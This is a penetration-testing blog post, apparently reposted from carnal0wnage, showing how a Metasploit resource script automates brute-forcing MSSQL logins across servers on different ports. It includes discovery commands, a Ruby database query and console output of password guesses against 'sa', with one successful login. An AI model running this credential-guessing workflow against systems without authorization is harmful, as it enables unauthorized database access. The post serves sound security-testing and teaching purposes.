MSSQL Brute forcing with Resource Scripts from carnal0wnage
How can we brute force MSSQL servers that listen on several different ports without having to manually change RPORT for each one?
*MSF Pro/Express handle this for you using the database.
Possible Solution:
Use a resource script to populate the values for us.
This works, but the data has to be in the database first.
1. Set up the database for Metasploit
2. Get a list of servers:
OSQL -L
Servers:
SEVERNAME1\SQL2000
SEVERNAME2\SQL2005
OSQL gives you a list of hostnames; we need to turn these hostnames into IP addresses/ranges for mssql_ping.
You can use post/windows/recon/resolve_hostname to resolve a list of hostnames and turn them into IP addresses.
msf post(resolve_hostname) > run
[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed
With a list of IP addresses, run mssql_ping:
msf auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+] InstanceName = MSSQLSERVER
[+] IsClustered = No
[+] tcp = 1433
[+] np = \\servername1\pipe\sql\query
[+] Version = 8.00.194
[+] ServerName = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+] InstanceName = INSTANCE1
[+] IsClustered = Yes
[+] tcp = 2261
[+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+] Version = 10.50.1600.1
[+] ServerName = SEVERNAME2
Now we can pull the TCP ports out using a db query and have the resource script set RHOSTS and RPORT for you per entry. weeeeeee
the query (inside the resource script's ruby block):
hosts = []
begin
  framework.db.services.each do |service|
    # keep only open MSSQL services on TCP, i.e. what mssql_ping recorded
    if service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp'
      hosts << {'ip' => service.host.address, 'port' => service.port}
    end
  end
end
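As an added example (not the post's resource script, and not Metasploit code), this Ruby turns mssql_ping-style output into the same {'ip' => ..., 'port' => ...} records the query above pulls from framework.db.services, and lists the instances that sit on a non-default port; the sample output is constructed to mirror the mssql_ping run shown above, and the function names are my own.

```ruby
# Added example, not the post's resource script: parse mssql_ping-style
# output into the {'ip' => ..., 'port' => ...} records the resource script
# otherwise pulls from framework.db.services, and flag non-default ports.
# The sample output is constructed to mirror the post's mssql_ping run.
MSSQL_PING_OUTPUT = <<~'OUT'
  [*] SQL Server information for 192.168.237.197:
  [+] InstanceName = MSSQLSERVER
  [+] IsClustered = No
  [+] tcp = 1433
  [+] np = \\servername1\pipe\sql\query
  [+] Version = 8.00.194
  [+] ServerName = SEVERNAME1
  [*] SQL Server information for 192.168.237.211:
  [+] InstanceName = INSTANCE1
  [+] IsClustered = Yes
  [+] tcp = 2261
  [+] np = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
  [+] Version = 10.50.1600.1
  [+] ServerName = SEVERNAME2
OUT
DEFAULT_MSSQL_PORT = 1433

# One hash per instance: the host address plus every "key = value"
# attribute the SQL Browser service reported for it.
def parse_mssql_ping(text)
  instances = []
  text.each_line do |line|
    line = line.strip
    if (m = line.match(/\A\[\*\] SQL Server information for (\S+):\z/))
      instances << { 'ip' => m[1] }
    elsif (m = line.match(/\A\[\+\] (\w+) = (.*)\z/)) && !instances.empty?
      instances.last[m[1]] = m[2]
    end
  end
  instances
end

# Reduce to the ip/port pairs a resource script iterates over; an instance
# that reported no TCP port (named-pipe only) is skipped rather than
# defaulted to 1433.
def mssql_targets(instances)
  instances.select { |i| i['tcp'] }
           .map { |i| { 'ip' => i['ip'], 'port' => i['tcp'].to_i } }
end

# Instances off TCP 1433 are why RPORT cannot be set once; list them so an
# inventory or firewall review accounts for each.
def non_default_ports(targets)
  targets.reject { |t| t['port'] == DEFAULT_MSSQL_PORT }
end
```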
We can use that query to populate the module options on the fly for us.
Example:
[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'
RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false
[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed
Code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb
Lots of other resource scripts are in the scripts/resource directory of your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource
Source:
http://carnal0wnage.attackresearch.com/2013/01/mssql-brute-forcing-with-resource.html